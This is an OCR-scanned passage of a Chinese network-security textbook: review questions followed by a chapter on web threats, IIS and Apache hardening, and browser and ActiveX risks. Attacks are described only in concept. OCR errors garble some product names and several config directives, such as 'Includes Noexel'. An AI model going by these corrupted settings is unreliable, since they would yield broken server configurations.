15. 基于 Windows 的 计算 机 将 事件 记录 在 3 种 日 志 中 , 分别 是 (  )、( 小 、 
( )。 要 记录 安全 日 志 ， 需 要 启用 ( ) 策 略 。 

16. 仅 备 份 自 上 次 正常 或 增 量 备份 以 来 创建 或 更 改 的 文件 ， 此 备份 类 型 属于 (  )。 

17. 操作 系统 或 分 区 备份 最 常 使 用 的 方法 是 ( 。 )。 


二 、 简 答题 
1. 信息 安全 工作 的 目的 及 安全 防范 体系 设计 过 程 中 应 遵循 的 原则 是 什么 ? 
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2. 账户 安全 是 系统 安全 的 基础 ， 请 从 密码 策略 和 账户 锁定 策略 两 个 方面 描述 你 的 账 
户 安全 策略 的 设置 。 

3. ”对 于 文件 和 文件 夹 ， 它 们 的 标准 NTFS 权限 分 别 是 什么 ? 请 简要 描述 。 

4. 在 某 个 公司 里 ， 假 设 老板 希望 在 保证 Windows 正常 运行 的 情况 下 ， 只 允许 员工 运 
行 AutoCAD， 不 允许 使 用 其 他 任何 程序 ， 请 简要 描述 其 安全 策略 的 配置 过 程 。 

5. 为 了 防止 “不 法 之 徒 ” 将 Windows 日 志文 件 清洗 一 空 的 情况 出 现 ， 系 统管 理 员 应 
该 采取 的 措施 是 什么 ? 
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【项 目 要 点 】 


Web 安全 的 基础 内 容 。 

Web 的 安全 问题 。 

Web 服务 器 的 安全 及 防范 配置 。 

Web 客户 端的 安全 及 防范 。 

利用 CA 证 书 和 SSL 安全 协议 构建 Web 服务 器 的 安全 配置 。 
【学 习 目 标 】 

了 解 Web 安全 的 基础 内 容 。 

了 解 Web 的 安全 问题 。 

掌握 Web 服务 器 的 安全 。 

掌握 Web 服务 器 的 防范 配置 。 

掌握 Web 客户 端的 安全 防范 。 

掌握 利用 CA 证 书 和 SSL 安全 协议 构建 Web 服务 器 的 安全 配置 。 


7.1 ”Web 安全 的 基础 内 容 


1. 概况 

随 着 Web 2.0、 社 交 网 络 、 微 博 等 一 系列 新 型 互联 网 产品 的 诞生 ， 基 于 Web 环境 的 互 
联网 应 用 越 来 越 广泛 ， 企 业 信息 化 的 过 程 中 各 种 应 用 都 架设 在 Web 平台 上 。Web 业务 的 
迅速 发 展 也 引起 黑客 们 的 强烈 关注 ， 接 中 而 至 的 就 是 Web 安全 威胁 的 凸显 ， 黑 客 利用 网 站 
操作 系统 的 漏洞 和 Web 服务 程序 的 SQL 注入 漏洞 等 得 到 Web 服务 器 的 控制 权限 ， 轻 则 自 
改 网 页 内 容 ， 重 则 窃取 重要 内 部 数据 ， 更 为 严重 的 则 是 在 网 页 中 植 入 恶意 代码 ， 网 站 访问 
者 受到 侵害 。 这 也 使 得 越 来 越 多 的 用 户 关注 应 用 层 的 安全 问题 ， 对 Web 应 用 安全 的 关注 度 
也 逐渐 升温 。 

2. 现状 原因 


目前 很 多 业务 都 依赖 于 互联 网 ， 如 网 上 银行 、 网 络 购物 、 网 游 等 ， 很 多 恶意 攻击 者 出 
于 不 良 的 目的 对 Web 服务 器 进行 攻击 ， 想 方 设法 通过 各 种 手段 获取 他 人 的 个 人 账户 信息 
谋取 利益 。 正 是 因为 这 样 ，Web 业务 平台 最 容易 遭受 攻击 。 同 时 ， 对 Web 服务 器 的 攻击 
也 可 以 说 是 形形色色 、 种 类 繁多 ， 常 见 的 有 挂 马 、SQL 注入 、 缓 冲 区 溢出 、 嗅 探 、 利 用 
IIS 等 针对 Webserver 漏洞 进行 攻击 。 

造成 这 种 现状 的 原因 主要 有 2 个 方面 。 

一 方面 ， 由 于 TCP/IP 的 设计 是 没有 考虑 安全 问题 的 ， 这 使 得 在 网 络 上 传输 的 数据 没 
有 任何 安全 防护 。 利 用 系统 漏洞 造成 系统 进程 缓冲 区 溢出 ， 攻 击 者 可 能 获得 或 者 提升 自己 
在 有 漏洞 的 系统 上 的 用 户 权 限 来 运行 任意 程序 ， 甚 至 安装 和 运行 恶意 代码 ， 窃 取 机 密 数 
据 。 而 应 用 层面 的 软件 在 开发 过 程 中 也 没有 过 多 考虑 到 安全 问题 ， 这 使 得 程序 本 身 存在 很 
多 漏洞 ， 如 缓冲 区 溢出 、SQL 注入 等 流行 的 应 用 层 攻 击 ， 均 属于 在 软件 研发 过 程 中 疏忽 了 
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对 安全 的 考虑 所 致 。 


另 一 方面 ， 用 户 对 某 些 隐秘 的 东西 带 有 强烈 的 好 奇 心 ， 一 些 利用 木马 或 病毒 程序 进行 
攻击 的 攻击 者 ， 往 往 就 利用 了 用 户 的 这 种 好 奇 心理 ， 将 木马 或 病毒 程序 捆绑 在 一 些 艳丽 的 
图 片 、 音 视频 及 免费 软件 等 文件 中 ， 然 后 把 这 些 文件 置 于 某 些 网 站 ， 再 引诱 用 户 去 单 击 或 
下 载运 行 。 或 者 通过 电子 邮件 附件 和 QQ、MSN 等 即时 聊天 软件 ， 将 这 些 捆绑 了 木马 或 病 
毒 的 文件 发 送 给 用 户 ， 利 用 用 户 的 好 奇 心理 引诱 用 户 打开 或 运行 这 些 文件 。 


3. 攻击 种 类 


(1) SQL 注入 : 即 通过 把 SQL 命令 插入 到 Web 表单 递交 或 输入 域名 与 页 面 请 求 的 查 
询 字符 串 ， 以 欺骗 服务 器 执行 恶意 的 SQL 命令 ， 如 先前 的 很 多 影视 网 站 泄露 VIP 会 员 密 
码 大 多 就 是 通过 Web 表单 递交 查询 字符 爆 出 的 ， 这 类 表单 特别 容易 受到 SQL 注入 式 
攻击 。 

(2) 跨 站 脚本 攻击 (也 称 为 XSS): 指 利用 网 站 漏洞 从 用 户 那里 恶意 盗 取 信息 。 用 户 在 浏 
览 网 站 、 使 用 即时 通讯 软件 ， 甚 至 在 阅读 电子 邮件 时 ， 通 常会 点 击 其 中 的 链接 。 攻 击 者 通 
过 在 链接 中 插入 恶意 代码 ， 就 能 够 盗 取 用 户 信息 。 

(3) 网 页 挂 马 : 把 一 个 木马 程序 上 传 到 一 个 网 站 里 面 ， 然 后 用 木马 生成 器 生成 一 个 网 
马 ， 再 利用 代码 使 得 木马 在 打开 网 页 时 运行 。 


4. 防火 墙 


所 谓 防火 墙 ， 指 的 是 一 个 由 软件 和 硬件 设备 组 合 而 成 、 在 内 部 网 和 外 部 网 之 间 、 专 用 
网 与 公共 网 之 间 的 界面 上 构造 的 保护 屏障 ， 是 一 种 获取 安全 性 方法 的 形象 说 法 。 它 是 一 种 
计算 机 硬件 和 软件 的 结合 ， 在 Internet 与 Intranet 之 间 建 立 起 一 个 安全 网 关 (Security 
Gateway)， 从 而 保护 内 部 网 免 受 非法 用 户 的 侵入 。 防 火 墙 主要 由 服务 访问 规则 、 验 证 工 
具 、 包 过 滤 和 应 用 网 关 4 个 部 分 组 成 ， 计 算 机 流入 流出 的 所 有 网 络 通信 和 数据 包 均 要 经 过 
此 防火 墙 。 

在 网 络 中 ， 所 谓 防火 墙 ， 是 指 一 种 将 内 部 网 和 公众 访问 网 (如 Intemet) 分 开 的 方法 。 它 
实际 上 是 一 种 隔离 技术 ， 是 在 两 个 网 络 通信 时 执行 的 一 种 访问 控制 尺度 ， 它 能 允许 你 “ 同 
意 ” 的 人 和 数据 进入 你 的 网 络 ， 同 时 将 你 “不 同意 ”的 人 和 数据 拒 之 门 外 ， 最 大 限度 地 阻 
止 网 络 中 的 黑客 来 访问 你 的 网 络 。 换 句 话说， 如果 不 通过 防火 墙 ， 公 司 内 部 的 人 就 无 法 访 
问 Intemet，Intemet 上 的 人 也 无 法 和 公司 内 部 的 人 进行 通信 。 


7.2” Web 安全 综述 
7.2.1 Internet 的 脆弱 性 
Web 是 建立 在 Intemet 上 的 典型 服务 ， 所 以 ，Intemet 的 安全 是 Web 安全 的 前 提 和 基 


础 。Internet 的 安全 隐患 主要 表现 如 下 。 
(1) Intemet 的 无 边界 性 为 黑客 进行 跨国 攻击 提供 了 有 利 的 条 件 ， 他 们 足 不 出 户 就 可 以 
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对 世界 上 任何 角落 的 主机 进行 攻击 和 破坏 。 

(2) Intemet 虚拟 的 “自由 、 民 主 、 平 等 ”观念 容易 使 人 轻易 接受 ， 不 同 的 社会 意识 形 
态 很 容易 相互 渗透 。 这 些 因素 为 Internet 的 应 用 埋 下 了 安全 隐患 。 

(3) Intemet 没有 确定 用 户 真 实 身 份 的 有 效 方 法 ， 通 过 IP 地 址 识别 和 管理 网 络 用 户 的 机 
制 是 不 可 靠 的 ， 存 在 着 严重 的 安全 漏洞 ， 容 易 被 欺骗 。 

(4) Intemet 是 分 布 式 的 网 络 ， 不 存在 中 央 监 控 管 理 机 制 ， 也 没有 完善 的 法 律 和 法 规 ， 
因此 无 法 对 Internet 犯罪 进行 有 效 的 处 理 。 

(5) Intemet 本 身 没有 审计 和 记录 功能 ， 对 发 生 的 事情 没有 记录 ， 这 本 身 也 是 一 个 安全 
(6) Intemet 从 技术 上 来 讲 是 开放 的 ， 是 基于 可 人 入、 友好 的 前 提 设 计 的 ， 是 为 君子 设计 
而 不 防 小 人 的 。 


7.2.2 ”Web 安全 问题 


1. 影响 Web 安全 的 因素 


(1) 由 于 Web 服务 器 存在 的 安全 漏洞 和 复杂 性 ， 使 得 依赖 这 些 服务 器 的 系统 经 常 面临 
一 些 无 法 预测 的 风险 。Web 站 点 的 安全 问题 可 能 涉及 与 它 相连 的 内 部 局 域 网 ， 如 果 局 域 网 
和 广域网 相连 ， 还 可 能 影响 到 广域网 上 其 他 的 组 织 。 另 外 ，Web 站 点 还 经 常 成 为 黑客 攻击 
其 他 站 点 的 跳板 。 随 着 Internet 的 发 展 ， 缺 乏 有 效 安全 机 制 的 Web 服务 器 正面 临 着 成 千 上 
万 种 计算 机 病毒 的 威胁 。Web 使 得 服务 器 的 安全 问题 显得 更 加 重要 。 

(2) Web 程序 员 由 于 工作 失误 或 者 程序 设计 上 的 漏洞 ， 也 可 能 造成 Web 系统 的 安全 缺 
陷 ， 这 些 缺 陷 可 能 被 一 些 心怀 不 满 的 员工 、 网 络 间谍 或 入 侵 者 所 利用 。 因 此 ， 在 Web 脚本 
程序 的 设计 上 ， 提 高 网 络 编程 质量 ， 也 是 提高 Web 安全 性 的 重要 方面 。 

(3) 用 户 是 通过 浏览 器 和 Web 站 点 进行 交互 的 ， 由 于 浏览 器 本 身 的 安全 漏洞 ， 使 得 非 
法 用 户 可 以 通过 浏览 器 攻击 Web 站 点 ， 这 也 是 需要 警惕 的 一 个 重要 方面 。 


2. Web 中 的 安全 问题 


(1) 未 经 授权 的 存 取 动 作 。 由 于 操作 系统 等 方面 的 漏洞 ， 使 得 未 经 授权 的 用 户 可 以 获 
得 Web 服务 器 上 的 秘密 文件 和 数据 ， 甚 至 可 以 对 数据 进行 修改 、 删 除 ， 这 是 Web 站 点 的 
一 个 严重 的 安全 问题 。 

(2) 窃取 系统 的 信息 。 用 户 侵入 系统 内 部 ， 获 取 系 统 的 一 些 重要 信息 ， 并 利用 这 些 系 
统 信息 达到 进一步 攻击 系统 的 目的 。 

(3) 破坏 系统 。 指 对 网 络 系统 、 操 作 系统 、 应 用 程序 进行 非法 使 用 ， 使 得 他 们 能 够 修 

(4) 病毒 破坏 。 目 前 ，Web 站 点 面临 着 各 种 各 样 病毒 的 威胁 ， 使 得 本 不 平静 的 网 络 变 
得 更 加 动荡 不 安 。 
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7.3 Web 服务 器 的 漏洞 及 配置 防范 
7.3.1 ”Web 服务 器 存在 的 漏洞 


Web 服务 器 存在 的 主要 漏洞 包括 物理 路 径 泄露 、 目 录 遍 历 、 执 行 任意 命令 、 缓 冲 区 滋 
出 、SQL 注入 、 拒 绝 服务 、 条 件 竞争 和 CGI 漏洞 。 

1. 物理 路 径 泄露 

物理 路 径 泄露 一 般 是 由 于 Web 服务 器 处 理 用 户 请 求 出 错 导致 的 ， 如 通过 提交 一 个 超 长 
的 请 求 ， 某 个 精心 构造 的 特殊 请 求 ， 或 是 请 求 一 个 Web 服务 器 上 不 存在 的 文件 。 这 些 请 求 
都 有 一 个 共同 特点 ， 那 就 是 被 请 求 的 文件 肯定 属于 CGI 脚本 ， 而 不 是 静态 HIML 页 面 。 
还 有 一 种 情况 ， 就 是 Web 服务 器 的 某 些 显示 环境 变量 的 程序 错误 地 输出 了 Web 服务 器 的 
物理 路 径 ， 这 通常 是 设计 上 的 问题 。 

2. 目录 遍历 


目录 遍历 攻击 又 称 目录 穿越、 恶意 浏览 、 文 件 泄露 等 ， 攻 击 者 利用 系统 漏洞 访问 合法 
应 用 之 外 的 数据 或 文件 目录 ， 导 致 数据 泄露 或 被 自 改 。 理 论 上 讲 ， 网 站 的 所 有 内 容 都 应 该 
位 于 主 目录 里 ， 即 使 内 容 位 于 别 的 位 置 ， 也 应 该 采用 虚拟 目录 的 形式 将 之 链接 到 主 目录 
中 。 作 为 客户 端 ， 当 然 也 只 能 访问 主 目录 中 的 内 容 。 但 是 如 果 网 站 存在 漏洞 ， 那 么 客户 端 
就 可 以 突破 主 目录 的 限制 ， 而 去 访问 其 他 目录 中 的 内 容 ， 这 也 就 是 所 谓 的 目录 遍历 攻击 。 

通过 目录 遍历 攻击 ， 黑 客 就 可 以 突破 网 站 主 目 录 的 限制 ， 而 去 访问 服务 器 上 的 敏感 
文件 。 


3. 执行 任意 命令 

执行 任意 命令 即 执行 任意 操作 系统 命令 ， 主 要 包括 两 种 情况 @ 通 过 遍历 目录 ， 如 二 
次 解码 和 “UNICODE 解码 漏洞 ， 来 执行 系统 命令 ;， @@Web 服务 器 把 用 户 提 交 的 请 求 作 为 
SSI 指令 解析 ， 因 此 导致 执行 任意 命令 。 

4. 缓冲 区 溢出 


缓冲 区 溢出 漏洞 是 非常 常见 的 ， 通 常 是 Web 服务 器 没有 对 用 户 提交 的 超 长 请 求 没有 进 
行 合适 的 处 理 ， 这 种 请 求 可 能 包括 超 长 URL， 超 长 HTTP Header 域 ， 或 者 是 其 他 超 长 的 数 
据 。 这 种 漏洞 可 能 导致 执行 任意 命令 或 者 是 拒绝 服务 ， 这 一 般 取 决 于 构造 的 数据 。 


5. SQL 注 入 

SQL 注入 的 漏洞 是 在 编程 过 程 中 造成 的 。 后 台数 据 库 允 许 动态 SQL 语句 执行 ， 前 台 
应 用 程序 没有 对 用 户 输入 的 数据 或 者 页 面 提交 的 信息 (如 GET) 进 行 必要 的 安全 检查 。 这 是 
数据 库 自身 的 特性 ， 与 Web 程序 的 编程 语言 无 关 。 几 乎 所 有 的 关系 数据 库 系统 和 相应 的 
SQL 语言 都 面临 SQL 注入 的 潜在 威胁 。 

6. 拒绝 服务 

拒绝 服务 产生 的 原因 多 种 多 样 ， 主 要 包括 超 长 URL、 特 殊 目录 、 超 长 HITP Header 
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域 、 畸 形 HTTP Header 域 或 者 是 DOS 设备 文件 等 。 由 于 Web 服务 器 在 处 理 这 些 特殊 请 求 
时 不 知 所 措 或 者 是 处 理 方式 不 当 ， 因 此 拒绝 服务 或 终止 请 求 。 


7. 条 件 竞争 

这 里 的 条 件 竞争 主要 针对 一 些 管理 服务 器 而 言 ， 这 类 服务 器 一 般 是 以 system 或 root 身 
份 运行 的 。 它 们 需要 使 用 一 些 临时 文件 ， 但 在 对 这 些 文件 进行 写 操作 之 前 ， 却 没有 对 文件 
的 属性 进行 检查 ， 一 般 可 能 导致 重要 系统 文件 被 重 写 ， 甚 至 获得 系统 控制 权 。 

8. CGI 漏洞 


CGI 是 Common Gateway Interface( 公 用 网 关 接 口 ) 的 简称 ， 并 不 特 指 一 种 语言 。Web 服务 
器 的 安全 问题 可 能 导致 CGI 源 代码 泄露 、 物 理 路 径 信息 泄露 、 系 统 敏感 信息 泄露 或 远程 执行 
任意 命令 。CGI 语言 漏洞 分 为 以 下 几 类 : 配置 错误 、 边 界 条 件 错 误 、 访 问 验 证 错误 、 来 源 验 
证 错误 、 输 入 验证 错误 、 策 略 错误 、 使 用 错误 ， 等 等 。CGI 漏洞 主要 体现 为 暴露 不 该 暴露 的 
信息 、 执 行 不 该 执行 的 命令 。 


7.3.2 ”Web 服务 器 的 安全 配置 


1. Windows Server 2008 下 Web 服务 器 的 安全 配置 


1) 目录 规划 与 安装 

安装 前 要 对 Web 目录 进行 规划 ， 系 统 文件 和 应 用 文件 要 分 别 放 在 不 同 的 分 区 上 ， 而且 
不 要 以 默认 的 方式 安装 ; 在 安装 的 过 程 中 ， 系 统 文件 不 要 安装 在 默认 路 径 上 。 由 于 IIS 存 
在 许多 漏洞 ， 容 易 受 到 黑客 的 攻击 ， 所 以 不 要 把 IS 安装 到 主 ( 域 ) 控 制 器 上 。 

2) 用 户 控制 

对 于 普通 用 户 来 讲 ， 其 安全 性 可 以 通过 相应 的 安全 策略 来 加 强 对 他 们 的 管理 ， 约 束 其 属 
性 和 行为 。 值 得 注意 的 是 ， 在 IIS 安装 完 以 后 ， 会 自动 生成 一 个 匿名 账号 IUSE_Computer_ 
name， 而 匿名 访问 Web 服务 器 应 该 被 禁止 ， 否 则 会 带 来 一 定 的 安全 隐患 。 

禁止 的 方法 : 启动 nteret 服务 管理 器 ， 右 击 Web 站 点 ， 选 择 “ 属 性 ”命令 ， 在 打开 
的 对 话 框 中 选择 “目录 安全 性 ”选项 卡 ， 单 击 “ 身 份 验证 和 访问 控制 ” 栏 的 “编辑 ” 按 
钮 ， 如 图 7-1 所 示 ， 打 开 “ 身 份 验证 方法 ”对 话 框 ; 在 该 对 话 框 中 取消 选中 “启用 匿名 访 
问 ” 复 选 框 即 可 ， 如 图 7-2 所 示 。 

3) 登录 认证 

IIS 服务 器 提供 了 匿名 访问 、 集 成 Windows 身份 验证 、Windows 域 服务 器 的 摘要 式 身 
份 验证 、 基 本 身份 验证 和 .NET Passport 身份 验证 5 种 登录 方式 。 其 中 匿名 访问 是 被 禁止 
的 。 在 实际 应 用 中 ， 用 户 可 以 根据 不 同 的 安全 需求 选择 不 同 的 IS 登录 认证 方式 。 

4) 访问 权限 控制 

(1) NTFS 文件 系统 的 访问 控制 。 

Web 服务 应 建立 在 NTFS 格式 之 上 ， 一 方面 容易 实现 其 访问 权限 的 控制 ， 对 不 同 的 用 
户 和 组 授予 不 同 的 访问 权限 ; 另 一 方面 还 可 以 有 效 利用 NTFS 文件 系统 的 审核 功能 ， 如 图 
7-3 和 图 7-4 所 示 。 
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(2) Web 目录 的 访问 权限 控制 。 
对 Web 目录 的 文件 夹 ， 可 以 通过 操作 Web 站 点 属性 页 实现 对 Web 目录 访问 权限 的 控 
制 ， 而 该 目录 下 的 所 有 文件 和 文件 夹 都 将 继承 这 些 安全 性 设置 。 


在 Intemet 服务 管理 器 中 ， 打 开 Web 站 点 的 属性 对 话 框 。Web 服务 除了 提供 NTFS 权 
限 外 ， 还 提供 读 取 权 限 和 执行 权限 。 读 取 权限 允许 用 户 读 取 或 下 载 Web 目录 中 的 文件 ， 执 
行 权限 允许 用 户 运 行 Web 目录 中 的 程序 和 脚本 ， 如 图 7-5 所 示 。 
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5) IP 地 址 控制 
IS 可 以 设置 允许 或 拒绝 从 特定 IP 地 址 发 来 的 服务 请 求 ， 有 选择 地 允许 特定 节点 的 用 
户 访问 Web 服务 。 


在 Web 站 点 属性 对 话 框 的 “目录 安全 性 ”选项 卡 ( 见 图 7-1) 中 单 击 “IP 地 址 和 域名 限 


制 ” 栏 中 的 “编辑 ”按钮 ， 打 开 “ 卫 地 址 及 域名 限制 ”对 话 框 ， 即 可 对 限制 的 情况 进行 设 
置 ， 如 图 7-6 所 示 。 
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图 7-6 IP 地 址 的 访问 限制 
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6) 站 点 端口 控制 


对 于 IIS 服务 来 讲 ， 无 论 是 Web 服务 、FTP 服务 ， 还 是 SMTP 服务 ， 都 有 各 自 的 TCP 
端口 号 用 来 监听 和 接收 用 户 浏览 器 发 出 的 请 求 。 在 实际 应 用 中 ， 可 以 通过 修改 默认 端口 号 
的 方法 来 提高 IIS 服务 器 的 安全 性 。 

修改 Web 站 点 TCP 端口 号 的 方法 为 : 打开 默认 Web 站 点 的 属性 对 话 框 ， 可 以 直接 把 

“TCP 端口 ”文本 框 中 的 内 容 改 为 其 他 数值 ， 如 图 7-7 所 示 。 

7) 安全 通信 机 制 

IIS 身份 认证 方式 除了 匿名 用 户 、 基 本 验证 、 集 成 Windows 验证 以 外 ， 还 有 一 种 安全 
性 更 高 的 认证 方式 一 一 数字 证 书 。 

在 “目录 安全 性 ”选项 卡 中 单 击 “ 服 务 器 证 书 ” 按 钮 ， 按 向 导 提示 就 可 以 很 容易 地 申 
请 到 数字 证 书 ， 如 图 7-8 所 示 。 
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7-7 “lS 站 点 的 端口 控制 图 7-8 lS 的 安全 通信 机 制 


2. Linux 下 Web 服务 器 的 安全 配置 


Apache 是 世界 使 用 排名 第 一 的 Web 服务 器 软件 ， 它 可 以 运行 在 几乎 所 有 计算 机 平台 
上 ， 其 特点 是 简单 、 速 度 快 、 性 能 稳定 ， 并 可 作为 代理 服务 器 。 

Apache Server 的 前 身 是 NCSA 的 httpd， 曾 经 在 1995 年 成 为 最 为 流行 的 万 维 网 服务 
器 。 因 为 强大 的 功能 和 灵活 的 设置 及 平台 移植 性 ，Apache Server 受 得 了 广泛 的 信赖 。 

Apache Server 的 主要 功能 如 下 。 

(1) 支持 最 新 的 HTTP 协议 (RFC2616)。 

(2) 极 强 的 可 配置 和 可 扩展 性 ， 充 分 利用 第 三 方 模块 的 功能 。 

(3) 提供 全 部 的 源 代码 和 不 受 限制 的 使 用 许可 (License)。 

(4) 广泛 应 用 于 Windows、Netware SX、OS/2 和 UNIX 家 族 及 其 他 操作 系统 ， 所 支持 
的 平台 多 达 17 种 。 
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正 因为 这 些 强大 的 优势 ， 使 Apache Server 与 其 他 的 Web 服务 器 相 比 ， 充 分 展示 了 高 
效 、 稳 定 及 功能 丰富 的 特点 。Apache Server 已 用 于 超过 600 万 个 Intemet 站 点 。 

1) 采用 自主 访问 控制 和 强制 性 访问 控制 的 安全 策略 

从 Apache 或 Web 的 角度 来 讲 ， 选 择 性 访问 控制 DAC(Discretionary Access Contro]) 仍 
是 基于 用 户 名 和 密码 的 ， 强 制 性 访问 控制 MAC(Mandatory Access ControD) 则 是 依据 发 出 请 
求 的 客户 端的 IP 地 址 或 所 在 的 域 号 来 进行 界定 。 

对 于 DAC 方式 ， 如 输入 错误 ， 那 么 用 户 还 有 机 会 更 正 ， 重 新 输入 正确 的 密码 ， 如 果 
用 户 通过 不 了 MAC 关卡 ， 那 么 用 户 将 被 禁止 做 进一步 的 操作 ， 除 非 服 务 器 做 出 安全 策略 
调整 ， 否 则 用 户 的 任何 努力 都 将 无 济 于 事 。 

2) Apache 服务 器 的 安全 配置 

(1) 以 nobody 用 户 运行 。 

一 般 情 况 下 ，Apache 是 由 root 来 安装 和 运行 的 。 如 果 Apache Server 进程 具有 root 用 
户 特权 ， 那 么 它 将 给 系统 的 安全 构成 很 大 的 威胁 ， 应 确保 Apache Server 进程 以 最 低 的 权限 
用 户 来 运行 。 

修改 Apache 服务 器 的 主 配置 文件 httpd.conf 文件 中 的 user 选项 ， 以 nobody 用 户 运行 
Apache， 可 以 达到 相对 安全 的 目的 ， 如 图 7-9 所 示 。 

¥ root®localhost:/etc/httpd/conf 四 门 其 
文件 EF) ”编辑 (E) ”查看 (V) 终端 了 转 到 ('G) 帮助 0H) 








[root@loca lhost root]# cd /etc/httpd/conf/ 中 
[root@localhost conf]# 1s 
httpd.conf httpd.conf.bak nagic ssl.crl ssl.csr ssl.prm 
httpd.confN httpd ( 复 件 ).conf Mkefile ssl.crt ssl.key 
[root@loca lhost conf]# vi httpd.con{] 

v 





7-9 Apache 的 主 配置 文件 路 径 
修改 httpd.conf 的 user 选项 如 下 : 


User nobody 

Group apache 

(2) Server Root 目录 的 权限 。 

为 了 确保 所 有 的 配置 是 适当 的 和 安全 的 ， 需 要 严格 控制 Apache 主 目录 的 访问 权限 ， 
使 非 超 级 用 户 不 能 修改 该 目录 中 的 内 容 。 

Apache 的 主 目录 权限 对 应 于 Apache Server 配置 文件 httpd.conf 中 的 Server Root 控制 项 。 

修改 httpd.conf 中 的 Server Root 的 选项 为 : /usr/local/apache 

(3) SSI 的 配置 。 

在 配置 文件 access.conf 或 httpd.conf 中 的 Options 指令 处 加 入 Includes Noexec 选项 ， 
可 以 禁用 Apache Server 中 的 执行 功能 。 

要 避免 用 户 直 接 执行 Apache 服务 器 中 的 执行 程序 ， 而 造成 服务 器 系统 的 公开 化 ， 可 
以 修改 httpd.conf 文 件 的 Options 选项 为 Includes Noexel。 

(4) Apache 服务 器 的 默认 访问 特性 。 

Apache 的 默认 设置 只 能 保障 一 定 程 度 的 安全 ， 如 果 服 务 器 能 够 通过 正常 的 映射 规则 
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找到 文件 ， 那 么 客户 端 便 会 获取 该 文件 ， 因 此 ， 要 禁止 对 文件 系统 的 默认 访问 。 


Order deny,allow 
Deny from all 


【案例 】 通过 配置 httpd.conf 来 实现 访问 控制 

访问 控制 的 含义 ， 人 允许 或 拒绝 某 些 P、 某 些 主 机 对 Apache 服务 器 的 某 个 目录 、 某 个 
文件 的 访问 。 

实现 方法 : 在 Apache 的 主 配置 文件 httpd.conf 中 ， 修 改 访问 控制 参数 。 可 以 用 特有 的 
命令 Allow、Deny 指定 某 些 用 户 可 以 访问 ， 哪 些 用 户 不 能 访问 ， 提 供 一 定 的 灵活 性 。 当 
Deny、Allow 一 起 用 时 ， 用 命令 Order 决定 Deny 和 Allow 合用 的 顺序 。 

(1) 允许 所 有 IP 和 主机 访问 /Var/www/html 目录 ， 可 创建 Directory 块 : 

<Directory /var/www/html> 

Order Allow ,Deny 


Allow from all 
</Directory> 


(2) 拒绝 某 类 地 址 的 用 户 对 服务 器 的 访问 权 (Deny): 


Order Allow, Deny 
Allow from all 
Deny from WWww.***.Com 


这 样 ， 可 让 所 有 的 人 访问 Apache 服务 器 ， 但 不 希望 来 自 www.***.com 的 任何 访问 。 
(3) 允许 某 类 地 址 的 用 户 对 服务 器 访问 (Allow): 


Order Deny, Allow 
Deny from all 
Allow from test.com.cn 


不 想 让 所 有 人 访问 ， 但 允许 test.com.cn 网 站 的 来 访 ， 即 可 如 此 设置 。 


7.4 Web 客户 端的 安全 
7.4.1 浏览 器 本 身 的 漏洞 


1. 传播 病毒 类 漏洞 


有 的 漏洞 可 以 被 利用 来 传播 病毒 ， 很 多 病毒 是 通过 IE 的 漏洞 入 侵 的 ， 如 通过 浏览 网 
页 可 以 感染 新 欢乐 时 光 等 脚本 病毒 。 


2. 木马 类 漏洞 


有 的 漏洞 还 可 能 被 木马 利用 ， 如 利用 正 Object Data 漏洞 可 以 实现 网 页 木马 。 该 漏洞 
是 HTML 中 Object 的 Data 标签 引起 的 。 


3. DOS 类 漏洞 
如 递归 Frames 漏洞 就 属于 这 一 类 漏洞 ， 它 通过 编写 一 段 错误 的 HTML 代码 而 产生 递 


(ea\. 


Ye 计算 机 网 络 安全 教程 


归 效 果 ， 直 到 耗 尽 内 存 资源 ， 从 而 导致 P 崩溃 。 
4. 跳板 类 漏洞 


如 IE3 及 之 前 的 快捷 方式 漏洞 。 如 果 一 个 快捷 方式 被 复制 到 一 个 Web 服务 器 上 ， 并 通 
过 Internet 来 访问 ， 将 会 打开 存放 在 用 户 本 地 的 该 文件 的 拷贝 。 


5. 欺骗 类 漏洞 


如 正 7 处 理 URL 中 字符 串 时 的 漏洞 ， 远 程 攻击 者 可 能 利用 此 漏洞 引导 用 户 执行 恶意 
操作 。 


6. 用 户 信息 泄露 类 漏洞 


下 浏览 器 中 的 安全 漏洞 ， 黑 客 利用 这 个 漏洞 能 够 使 用 Google 桌面 软件 远程 访问 用 户 
的 口令 和 信用 卡 账号 等 个 人 信息 。 


7.4.2 ”ActiveX 的 安全 性 


1. 什么 是 ActiveX 


ActiveX 是 Microsoft 对 于 一 系列 策略 性 面向 对 象 程序 技术 和 工具 的 称呼 ， 其 中 主要 的 
技术 是 组 件 对象 模 型 (COM)。 

ActiveX 与 具体 的 编程 语言 无 关 。 作 为 针对 Internet 应 用 开发 的 技术 ，ActiveX 被 广泛 
应 用 于 Web 服务 器 以 及 客户 端的 各 个 方面 。 同 时 ，ActiveX 技术 也 被 用 于 方便 地 创建 普通 
桌面 应 用 程序 。 

由 于 ActiveX 是 可 以 插入 到 Web 页 面 或 其 他 应 用 程序 中 的 一 些 软件 组 件 或 对 象 ， 因 和 而 
也 叫 ActiveX 插件 或 ActiveX 控件 。 


2. ActiveX 控件 的 安全 问题 


下 浏览 器 通常 应 用 安全 级 别 和 认证 两 种 策略 来 保证 ActiveX 插件 的 安全 。 

(1) 正 的 安全 级 别 可 分 为 “默认 级 别 ” 和 “ 自 定义 级 别 ” 两 种 。 焉 的 “ 自 定义 级 别 ” 
为 用 户 提 供 自主 选择 与 实际 需求 相 匹 配 安全 策略 的 机 会 。 而 “默认 级 别 ” 又 分 为 高 、 中 、 
中 低 、 低 4 级 。ActiveX 控件 实际 的 默认 级 别 为 “中 ”， 即 软件 安装 之 前 ， 用 户 可 以 根据 
自己 对 软件 发 行商 和 软件 本 身 的 信任 程度 ， 选 择 决定 是 否 继续 安装 和 运行 此 软件 。 

(2) ActiveX 控件 通过 数字 签名 来 进行 认证 ， 浏 览 器 可 以 拒绝 未 被 正确 签名 的 ActiveX 
控件 。Microsoft 采用 鉴别 码 认证 技术 对 ActiveX 控件 进行 签名 ， 可 以 让 用 户 验证 ActiveX 
控件 作者 的 身份 ， 并 核实 是 否 有 人 算 改 过 这 个 控件 。 

3. IE 浏览 器 中 Activex 控件 的 设置 

(1) 启动 正 浏览 器 ， 选 择 “ 工 具 ” 一 “Internet 选项 ”菜单 命令 ， 选 择 “ 安 全 ” 选 
项 卡 。 

(2) 在 列表 框 内 选择 Intermnet， 然 后 单 击 “ 自 定义 级 别 ” 按 钮 ， 根 据 需 要 来 设置 相应 
的 ActiveX 控件 如 图 7-10 所 示 。 
